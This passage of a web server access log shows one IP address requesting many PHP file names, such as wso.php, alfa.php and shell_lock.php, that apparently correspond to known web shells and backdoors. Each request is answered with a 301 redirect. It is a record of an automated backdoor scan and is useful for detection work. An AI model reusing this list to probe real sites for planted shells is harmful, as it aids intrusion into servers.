"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:13 +0700] "GET /id.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:15 +0700] "GET /rename.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:16 +0700] "GET /as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:17 +0700] "GET /wso2023.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:21 +0700] "GET /cool.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:22 +0700] "GET /ey.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:23 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:25 +0700] "GET /v2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:27 +0700] "GET /v3.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:31 +0700] "GET /leaf.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:32 +0700] "GET /0.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:34 +0700] "GET /0x.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:37 +0700] "GET /wp-ver.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:39 +0700] "GET /use.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:40 +0700] "GET /wp-clon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:42 +0700] "GET /blvck.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:47 +0700] "GET /defaul1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:52 +0700] "GET /domain.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:54 +0700] "GET /wp-editor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:56 +0700] "GET /mano.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:59 +0700] "GET /sx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:01 +0700] "GET /readme.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:03 +0700] "GET /1234.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:05 +0700] "GET /whmcs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:07 +0700] "GET /db-config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:09 +0700] "GET /gac.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:11 +0700] "GET /shelss.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:19 +0700] "GET /xzd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:21 +0700] "GET /xzdd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:22 +0700] "GET /wp-mailcek.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:26 +0700] "GET /revisi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:28 +0700] "GET /degesaciihaxor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:30 +0700] "GET /sym403.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:34 +0700] "GET /22.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:36 +0700] "GET /devil.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:39 +0700] "GET /byp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:40 +0700] "GET /hhh.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:43 +0700] "GET /sambernyawa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:45 +0700] "GET /data-user.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:46 +0700] "GET /301.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:47 +0700] "GET /wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:50 +0700] "GET /zec.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:52 +0700] "GET /class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:54 +0700] "GET /sct.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:55 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:15:58 +0700] "GET /wp-user.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:02 +0700] "GET /wp-smail.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:04 +0700] "GET /shell_lock.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:08 +0700] "GET /teamadmin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:09 +0700] "GET /lux.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:12 +0700] "GET /sang3.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:16 +0700] "GET /mm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:17 +0700] "GET /pirja.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:19 +0700] "GET /olux.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:20 +0700] "GET /module.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:21 +0700] "GET /ab.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:22 +0700] "GET /su.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:24 +0700] "GET /ar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:25 +0700] "GET /sam.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:28 +0700] "GET /default.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:29 +0700] "GET /ikeh.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:31 +0700] "GET /includes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:34 +0700] "GET /mega.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:35 +0700] "GET /inc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:37 +0700] "GET /syd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:39 +0700] "GET /fierza.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:40 +0700] "GET /green.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:42 +0700] "GET /theme-single.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:44 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:48 +0700] "GET /themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:51 +0700] "GET /profile.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:55 +0700] "GET /class_appfun.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:56 +0700] "GET /user-edit.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:16:59 +0700] "GET /class-ftp-pures.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:01 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:02 +0700] "GET /by.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:05 +0700] "GET /cy.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:08 +0700] "GET /config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:10 +0700] "GET /sql.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:11 +0700] "GET /aa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:15 +0700] "GET /aaa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:17 +0700] "GET /rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:19 +0700] "GET /mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:21 +0700] "GET /cylul.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:26 +0700] "GET /fx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:29 +0700] "GET /fx-mini.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:32 +0700] "GET /FX.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:35 +0700] "GET /wp-commentin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:37 +0700] "GET /data.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:39 +0700] "GET /update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:41 +0700] "GET /wsoshell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:43 +0700] "GET /defaul.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:45 +0700] "GET /filemanager.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:47 +0700] "GET /wp-functions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:51 +0700] "GET /wp_fma.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:52 +0700] "GET /text.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:54 +0700] "GET /alfa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:55 +0700] "GET /alfaaneh.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:17:57 +0700] "GET /wp_mna.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:00 +0700] "GET /wp-god.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:03 +0700] "GET /wp-class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:07 +0700] "GET /xleet.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:08 +0700] "GET /ok.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:10 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:12 +0700] "GET /403.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:13 +0700] "GET /fw.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:15 +0700] "GET /wp-info.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:17 +0700] "GET /1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:19 +0700] "GET /9.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:20 +0700] "GET /vv.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:23 +0700] "GET /alf.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:25 +0700] "GET /orange.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:27 +0700] "GET /en.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:29 +0700] "GET 